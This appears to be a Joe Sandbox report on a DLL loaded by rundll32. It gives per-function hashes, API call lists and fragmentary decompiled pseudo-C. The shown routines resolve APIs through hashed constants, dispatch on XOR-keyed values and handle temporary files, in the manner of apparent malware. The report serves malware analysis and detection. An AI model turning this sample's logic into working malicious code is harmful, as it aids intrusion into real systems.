Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocFreelstrcmpilstrlen
String ID:
API String ID: 727816722-0
Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 000001817BE03EDC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R, xrefs: 000001817BE04064

Memory Dump Source

Source File: 00000005.00000002.246593864.000001817BE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001817BE00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1817be00000_rundll32.jbxd

Similarity

API ID:
String ID: R
API String ID: 0-1466425173
Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
Instruction ID: 20cdb0d890fdd51447cc2a5b760136e6336927b485a7a87d006693e04035c982
Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
Instruction Fuzzy Hash: 17813232218644AFE7A4DB188655FE976F5FB98340FB4C45DE28AC33D1DF218E869702

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800025EC Relevance: 3.0, APIs: 2, Instructions: 14
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00000001800025F7
WaitForSingleObject.KERNEL32 ref: 0000000180002615

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ObjectSingleSleepWait
String ID:
API String ID: 309074506-0
Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700

Uniqueness

Uniqueness Score: -1.00%

Function 000001817BE03880 Relevance: 1.7, APIs: 1, Instructions: 154
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 000001817BE03A5F

Memory Dump Source

Source File: 00000005.00000002.246593864.000001817BE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001817BE00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1817be00000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
Instruction ID: 28dadbc164e61d504d5fbc178535565061f7f077f2ec0cf3f70d6d22a6807003
Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
Instruction Fuzzy Hash: 2F512372518644AFF7A4DB18C254BE976E5FB8C300FB4881DE286C33D1DF348A869B52

Uniqueness

Uniqueness Score: -1.00%

Function 000001817BE01C0B Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.246593864.000001817BE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001817BE00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1817be00000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
Instruction ID: 492e07213218143bc3489b479fd365ab6718e0e00c0d12bcafa19a9d48f09c17
Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
Instruction Fuzzy Hash: 20513236518644AFE7A8D7198094FED72E9FB94301FA4851DF246CB391EF28DE829703

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000000180006344 Relevance: 31.7, APIs: 21, Instructions: 220
memorystringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000001800061B8), ref: 000000018000638C
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180006397

Part of subcall function 00000001800066A8: Sleep.KERNEL32 ref: 00000001800066D2
Part of subcall function 00000001800066A8: GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800066DD
Part of subcall function 00000001800066A8: HeapAlloc.KERNEL32 ref: 00000001800066F1

lstrlenA.KERNEL32 ref: 00000001800063E6
lstrlenA.KERNEL32 ref: 00000001800063F2
HeapAlloc.KERNEL32 ref: 0000000180006405
lstrcpyA.KERNEL32 ref: 000000018000641D
lstrcatA.KERNEL32 ref: 0000000180006444
lstrcatA.KERNEL32 ref: 0000000180006450
lstrlenA.KERNEL32 ref: 0000000180006482
HeapAlloc.KERNEL32 ref: 000000018000649B
_snprintf.NTDLL ref: 000000018000650F
HeapFree.KERNEL32 ref: 000000018000651E
HeapAlloc.KERNEL32 ref: 0000000180006577
_snprintf.NTDLL ref: 00000001800065E5
_snprintf.NTDLL ref: 0000000180006614
HeapFree.KERNEL32 ref: 000000018000662C
HeapFree.KERNEL32 ref: 000000018000663C
HeapFree.KERNEL32 ref: 000000018000664A
HeapFree.KERNEL32 ref: 0000000180006658
HeapFree.KERNEL32 ref: 000000018000666B
HeapFree.KERNEL32 ref: 0000000180006679

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
String ID:
API String ID: 4119021385-0
Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008D78 Relevance: 24.2, APIs: 16, Instructions: 249
memorystringtimeCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00000001180008D78(void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
				void* _t77;
				void* _t88;
				intOrPtr _t91;
				void* _t96;
				char _t97;
				void* _t115;
				long long* _t157;
				void* _t158;
				long long _t160;
				char* _t162;
				long long _t163;
				char* _t178;
				char* _t179;
				void* _t203;
				long long _t204;
				void* _t208;
				intOrPtr* _t209;
				int _t211;
				void* _t215;
				void* _t216;
				void* _t235;
				long _t238;
				long _t244;
				void* _t246;
				CHAR* _t253;
				long long _t254;

				_t235 = _t215;
				 *((long long*)(_t235 + 8)) = __rbx;
				 *((long long*)(_t235 + 0x10)) = __rdx;
				_t216 = _t215 - 0x40;
				r13d =  *0x8000d498;
				_t209 = __rcx;
				 *((long long*)(_t216 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
				if (E00000001180002370(r13d ^ 0x55e7ce26,  *((intOrPtr*)( *0x8000d4a0 + 8)), __rdx, _t235) != 0) goto 0x800090ee;
				_t204 =  *((intOrPtr*)( *0x8000d4a0 + 8));
				_t157 =  *_t209;
				 *((long long*)(_t216 + 0x98)) = _t157;
				 *((long long*)(_t216 + 0x28)) = _t204;
				if ( *((intOrPtr*)(_t216 + 0x20)) == 0) goto 0x80008f65;
				r8d = lstrlenA(_t253) + 1;
				HeapAlloc(_t246, _t244, _t238);
				_t254 = _t157;
				if (_t157 == 0) goto 0x800090e4;
				memcpy(_t203, _t208, _t211);
				_t162 = _t254;
				if ( *_t162 == 0x20) goto 0x80008e46;
				if ( *_t162 != 9) goto 0x80008e4b;
				_t163 = _t162 + 1;
				goto 0x80008e3c;
				if ( *_t163 == 0) goto 0x80008ecc;
				lstrlenA(??);
				asm("cdq");
				_t12 = _t157 + 1; // 0x1
				r8d = _t12;
				HeapAlloc(??, ??, ??);
				if (_t157 == 0) goto 0x80008ece;
				_t96 =  *_t163;
				if (_t96 == 0) goto 0x80008e99;
				if (_t96 == 0x20) goto 0x80008e95;
				_t178 = _t163 + 1;
				_t97 =  *_t178;
				if (_t97 != 0) goto 0x80008e87;
				if (_t97 != 0) goto 0x80008e9b;
				if (_t178 == 0) goto 0x80008eb5;
				 *_t178 = 0;
				_t179 = _t178 + 1;
				if ( *_t179 == 0x20) goto 0x80008eb0;
				if ( *_t179 != 9) goto 0x80008eb5;
				goto 0x80008ea6;
				 *_t157 = _t163;
				_t158 = _t157 + _t204;
				if (_t179 + 1 != 0) goto 0x80008e7e;
				goto 0x80008ed6;
				if (0 == 0) goto 0x80008f4f;
				E0000000118000958C( *((intOrPtr*)(_t216 + 0x98)) + 0x18);
				 *((long long*)(_t209 + 0x40)) = _t254;
				 *((long long*)(_t209 + 0x48)) =  *((intOrPtr*)(_t216 + 0x90));
				 *((intOrPtr*)(_t209 + 0x50)) = bpl;
				if ( *((char*)(_t209 + 0x70)) == 0) goto 0x80008f09;
				 *((char*)(_t209 + 0x70)) = 0;
				asm("lock and dword [esi+0x2c], 0xfffffffe");
				LeaveCriticalSection(??);
				if ( *((intOrPtr*)(_t209 + 0x40)) == 0) goto 0x80008f3e;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80008f6a;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				if (0x57 != 0) goto 0x800090f3;
				if (E00000001180002370(r13d ^ 0x881e33f6, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090ee;
				_t77 = E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98);
				_t91 =  *((intOrPtr*)(_t216 + 0x98));
				if (_t77 != 0) goto 0x80008fd2;
				if (_t91 == 0) goto 0x800090ee;
				 *((intOrPtr*)(_t209 + 0x28)) = _t91;
				if (E00000001180002370(r13d ^ 0xa2dd2342, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x8000905e;
				_t39 = _t158 + 0x10; // 0x10
				_t88 = _t39;
				_t115 =  <  ?  *((void*)(_t216 + 0x90)) : _t88;
				E0000000118000958C( *_t209 + 0x18);
				r8d = _t115;
				memcpy(??, ??, ??);
				if (_t115 - _t88 >= 0) goto 0x80009043;
				r8d = _t88 - _t115;
				memset(??, ??, ??);
				LeaveCriticalSection(??);
				HeapFree(??, ??, ??);
				r13d = r13d ^ 0x1a1a0866;
				if (E00000001180002370(r13d, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090f3;
				if (E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98) == 0) goto 0x800090f3;
				if ( *((intOrPtr*)(_t216 + 0x98)) == 0) goto 0x800090f3;
				_t55 =  *_t209 + 0x18; // 0x28
				E0000000118000958C(_t55);
				GetSystemTimeAsFileTime(??);
				_t160 =  *((intOrPtr*)(_t216 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
				 *((long long*)(_t216 + 0x30)) = _t160;
				 *((long long*)(_t209 + 0x30)) = _t160;
				LeaveCriticalSection(??);
				goto 0x800090f3;
				goto 0x80008f6a;
				return 1;
			}

APIs

lstrlenA.KERNEL32(?,?,?,?,000000B0,00000008,?,0000000180002348), ref: 0000000180008DFC
HeapAlloc.KERNEL32 ref: 0000000180008E0E
memcpy.NTDLL ref: 0000000180008E29
lstrlenA.KERNEL32 ref: 0000000180008E53
HeapAlloc.KERNEL32 ref: 0000000180008E6B
LeaveCriticalSection.KERNEL32 ref: 0000000180008F12
HeapFree.KERNEL32 ref: 0000000180008F2A
HeapFree.KERNEL32 ref: 0000000180008F38
HeapFree.KERNEL32 ref: 0000000180008F57
HeapFree.KERNEL32(?,?,?,?,000000B0,00000008,?,0000000180002348), ref: 0000000180008F77
memcpy.NTDLL ref: 0000000180009026
memset.NTDLL ref: 000000018000903E
LeaveCriticalSection.KERNEL32 ref: 0000000180009048
HeapFree.KERNEL32 ref: 0000000180009058
GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800090B7
LeaveCriticalSection.KERNEL32 ref: 00000001800090DC

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
String ID:
API String ID: 3273538229-0
Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001844 Relevance: 19.7, APIs: 13, Instructions: 167
memoryfilestringCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 15%

			E00000001180001844(long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
				signed long long _v72;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t27;
				int _t34;
				void* _t36;
				int _t53;
				int _t61;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr* _t92;
				signed long long _t93;
				intOrPtr* _t106;
				void* _t118;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				void* _t125;
				signed long long _t132;
				void* _t140;
				void* _t145;

				_t94 = __rbx;
				_a8 = __rbx;
				_t92 =  *0x8000d4a0;
				r12d = 0;
				_t145 = __rcx;
				if (__rdx == _t140) goto 0x80001a6f;
				if ( *__rdx == r12b) goto 0x80001a6f;
				E00000001180007B04(__rbx, __rdx, _t118, _t121, _t125, __rdx);
				if (_t92 == _t140) goto 0x80001a6a;
				_t93 =  *0x8000d4a0;
				_t27 = GetTempPathW(??, ??);
				if (_t27 == r12d) goto 0x80001a55;
				HeapAlloc(??, ??, ??);
				if (_t93 == _t140) goto 0x80001a55;
				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
				GetSystemTimeAsFileTime(??);
				r8d = GetCurrentThreadId() ^ _a32;
				if (GetTempFileNameW(??, ??, ??, ??) != r12d) goto 0x80001927;
				_t132 = _t93;
				HeapFree(??, ??, ??);
				if (_t140 == _t140) goto 0x80001a55;
				_t122 = _t92;
				__imp__StrChrW();
				r8d = 0;
				if (_t93 == _t132) goto 0x80001964;
				_a16 = _t27;
				goto 0x80001976;
				_t106 = _t122;
				_t34 = lstrlenW(??);
				r8d = 0;
				_a16 = _t34;
				if (_t34 == r8d) goto 0x800019a7;
				_t11 = _t106 - 1; // -1
				_t61 = _t11;
				_t68 =  *((intOrPtr*)(_t122 + _t93 * 2));
				if (_t68 == 0x20) goto 0x8000198e;
				if (_t68 != 9) goto 0x80001999;
				_t53 = _t61;
				_a16 = _t61;
				if (_t61 != r8d) goto 0x8000197b;
				if (_t53 == r8d) goto 0x800019a7;
				_t69 =  *_t122;
				if (_t69 == 0x20) goto 0x800019ad;
				if (_t69 != 9) goto 0x800019b9;
				_t123 = _t122 + 2;
				_a16 = _t53 - 1;
				goto 0x80001999;
				 *((intOrPtr*)(_t123 + _t93 * 2)) = r8w;
				if ( *_t123 == r8w) goto 0x800019ef;
				_v72 = _t132;
				r9d = 0;
				_t36 = E00000001180009B7C(_t94, _t145, _t123, _t140, _t123,  *((intOrPtr*)(_t93 + 8)), _t140);
				if (_t36 != 0) goto 0x80001a3c;
				if (_t93 + 2 == 0) goto 0x800019f4;
				goto 0x80001938;
				if (_t36 != r8d) goto 0x80001a3c;
				if (E00000001180003698(_t36 - r8d, _t94, _t140,  &_a24,  *((intOrPtr*)(_t93 + 8)),  &_a16, _t93) != 0) goto 0x80001a3c;
				r9d = _a16;
				E00000001180005BDC(_t94, _t145, _t93 + 2,  *((intOrPtr*)(_t93 + 8)), _a24);
				HeapFree(??, ??, ??);
				DeleteFileW(??);
				HeapFree(??, ??, ??);
				goto 0x80001a5a;
				HeapFree(??, ??, ??);
				goto 0x80001a6f;
				return 8;
			}

APIs

Part of subcall function 0000000180007B04: lstrlenA.KERNEL32 ref: 0000000180007B2B
Part of subcall function 0000000180007B04: HeapAlloc.KERNEL32 ref: 0000000180007B46
Part of subcall function 0000000180007B04: memset.NTDLL ref: 0000000180007B71

GetTempPathW.KERNEL32 ref: 00000001800018A8
HeapAlloc.KERNEL32 ref: 00000001800018C3
GetTempPathW.KERNEL32 ref: 00000001800018DA
GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800018ED
GetCurrentThreadId.KERNEL32 ref: 00000001800018F3
GetTempFileNameW.KERNEL32 ref: 000000018000190B
HeapFree.KERNEL32 ref: 000000018000191E
StrChrW.SHLWAPI ref: 0000000180001940
lstrlenW.KERNEL32 ref: 0000000180001967
HeapFree.KERNEL32 ref: 0000000180001A36
DeleteFileW.KERNEL32 ref: 0000000180001A3F
HeapFree.KERNEL32 ref: 0000000180001A4D
HeapFree.KERNEL32 ref: 0000000180001A62

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
String ID:
API String ID: 2968359827-0
Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005748 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184
memorysynchronizationCOMMONCrypto

Download Yara Rule

C-Code - Quality: 53%

			E00000001180005748(void* __ecx, signed int __edx, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				signed int _t35;
				void* _t69;
				void* _t80;
				char* _t113;
				signed long long _t116;
				char* _t124;
				void* _t142;
				void* _t145;
				char* _t147;
				signed long long _t150;
				void* _t152;
				void* _t153;
				long _t169;
				void* _t170;
				void* _t172;
				void* _t175;

				_t116 = __rbx;
				 *((long long*)(_t152 + 8)) = __rbx;
				 *(_t152 + 0x18) = _t150;
				_t153 = _t152 - 0x40;
				_t113 =  *0x8000d4a0;
				r15d =  *0x8000d498;
				_t35 = r15d ^ __edx;
				_t146 = __r8;
				_t170 = __rcx;
				_t4 = _t150 + 1; // 0x1
				_t80 = _t4;
				if (_t35 == 0x139d2b8d) goto 0x8000588d;
				if (_t35 == 0x15f5a8c2) goto 0x80005865;
				if (_t35 == 0x2f77acf9) goto 0x8000588b;
				if (_t35 == 0x31f2972e) goto 0x80005861;
				if (_t35 == 0x48e12436) goto 0x80005965;
				if (_t35 == 0x4d382929) goto 0x80005905;
				if (_t35 == 0x7f513d6b) goto 0x80005863;
				if (_t35 == 0xb016dc39) goto 0x80005852;
				if (_t35 == 0xb057dfc9) goto 0x800057e4;
				goto 0x800059bb;
				if (r9d == 0) goto 0x80005848;
				E000000011800024CC(r9d, __rbx, __r8, __r8, _t175);
				if (_t113 == 0) goto 0x8000583e;
				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t116;
				if (E00000001180002668(_t113, _t116, _t170, 0x180001844, _t146, _t150, _t113,  *((intOrPtr*)(_t153 + 0x90))) != 0) goto 0x8000582b;
				goto 0x800059bb;
				HeapFree(_t172, _t169, _t142);
				goto 0x800059bb;
				goto 0x800059bb;
				goto 0x800059bb;
				SetEvent(_t145);
				goto 0x800059bb;
				if (r9d == 0) goto 0x80005848;
				_t124 = _t113;
				E000000011800024CC(r9d, _t116, _t124, _t146);
				_t147 = _t113;
				if (_t113 == 0) goto 0x8000583e;
				if (_t80 + _t80 != 2) goto 0x800058ae;
				goto 0x800058c2;
				if ( *((intOrPtr*)(_t124 + 0x50)) == 0) goto 0x800058ec;
				WaitForSingleObject(??, ??);
				asm("sbb ebx, ebx");
				goto 0x800058f1;
				_t139 =  ==  ? 0x18000543c : 0x180001b7c;
				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t150;
				if (E00000001180002668(0x18000543c, _t116, _t170,  ==  ? 0x18000543c : 0x180001b7c, _t147, _t150, _t147,  *((intOrPtr*)(_t153 + 0x90))) == 0) goto 0x80005821;
				goto 0x8000582e;
				if (_t80 == 0) goto 0x800059bb;
				if (0x426 != 0x426) goto 0x800059bb;
				if (_t147 == 0) goto 0x8000595f;
				if ( *_t147 == 0) goto 0x8000595f;
				memset(??, ??, ??);
				if (E000000011800020DC(0x18000543c, _t116, _t147, _t153 + 0x30, _t147) != 0) goto 0x8000595d;
				if (E000000011800038F8(_t147, _t153 + 0x30, _t153 + 0x78) == 0) goto 0x8000595f;
				asm("ror ax, 0x8");
				 *((short*)(_t153 + 0x32)) =  *(_t153 + 0x78) & 0x0000ffff;
				if (0 != 0) goto 0x800059bb;
				if ( *(_t170 + 0x50) == 0) goto 0x8000599a;
				 *(_t170 + 0x50) =  *(_t170 + 0x50) & 0x00000000;
				E00000001180007950(0,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t170 + 0x50), _t113,  *(_t170 + 0x50), _t150);
				HeapFree(??, ??, ??);
				goto 0x8000599f;
				if (_t80 == 0) goto 0x800059bb;
				_t69 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t153 + 0x30, _t113,  *(_t170 + 0x50), _t150,  *((intOrPtr*)(_t170 + 0x38)), _t170 + 0x50);
				if ( *((long long*)(_t153 + 0x90)) == 0) goto 0x800059e1;
				if (_t69 == 0x3e5) goto 0x800059e1;
				r8d = _t69;
				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t170,  *((intOrPtr*)(_t153 + 0x90)), _t150);
				return _t69;
			}

APIs

HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990

Strings

6$H, xrefs: 00000001800057AE
))8M, xrefs: 00000001800057B9
lJu, xrefs: 0000000180005914

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FreeHeap$EventObjectSingleWaitmemset
String ID: ))8M$6$H$lJu
API String ID: 2222956709-2816507560
Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004A14 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 24%

			E00000001180004A14(void* __ebx, void* __ecx, long long* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24, long long* _a40, void* _a48, intOrPtr _a56) {
				void* _v40;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v104;
				intOrPtr _v120;
				long long _v128;
				long long _v136;
				char _t57;
				intOrPtr _t95;
				void* _t96;
				long long* _t114;
				long long* _t115;

				_t114 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t141 =  *0x8000d4a0;
				r14d = __ecx;
				_t95 = r8d;
				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t114 == 0) goto 0x80004a75;
				r9d = 0x18;
				r8d = 0;
				_v136 = 0xf0000040;
				 *_t114();
				goto 0x80004a77;
				if (0 == 0) goto 0x80004c20;
				r8d = _a56;
				_t10 =  &_v96; // -190
				if (E00000001180006D04(__rbx, _v88, __rsi, _t10) != 0) goto 0x80004c02;
				_t11 = _t114 + 0x10; // 0x10
				r15d = _t11;
				memset(??, ??, ??);
				E0000000118000459C(0xd74cfe41, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t114 == 0) goto 0x80004ae3;
				r9d = 0;
				 *_t114();
				goto 0x80004ae5;
				if (0 != 0) goto 0x80004af9;
				if (GetLastError() != 0) goto 0x80004c02;
				_t57 =  >  ? r15d : _t95;
				r8d = _t57;
				_v104 = _t57;
				memcpy(??, ??, ??);
				_t96 = _t95 - _v104;
				if (r14d == 0) goto 0x80004b70;
				E0000000118000459C(0x4217c141, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t114 == 0) goto 0x80004baa;
				r8d = 0;
				_t23 =  &_v104; // -198
				_v120 = 0x20;
				_v128 = _t23;
				_t26 =  &_v80; // -174
				r8b = _t96 == 0;
				_v136 = _t26;
				r9d = 0;
				 *_t114();
				goto 0x80004bac;
				E0000000118000459C(0x8ea73a36, _t114, _v96);
				if (_t114 == 0) goto 0x80004baa;
				r8d = 0;
				_t29 =  &_v104; // -198
				_v128 = _t29;
				r8b = _t96 == 0;
				_t31 =  &_v80; // -174
				_v136 = _t31;
				r9d = 0;
				 *_t114();
				goto 0x80004bac;
				if (0 == 0) goto 0x80004bd6;
				r8d = _v104;
				memcpy(??, ??, ??);
				if (_t96 == 0) goto 0x80004bde;
				goto 0x80004afd;
				GetLastError();
				_t115 = _a40;
				 *_t115 = 0 + _v104;
				E0000000118000459C(0xff709000, _t115,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t115 == 0) goto 0x80004c02;
				 *_t115();
				E0000000118000459C(0xbaca8f4d, _t115,  *((intOrPtr*)(_t141 + 0x20)));
				if (_t115 == 0) goto 0x80004c28;
				 *_t115();
				goto 0x80004c28;
				return GetLastError();
			}

APIs

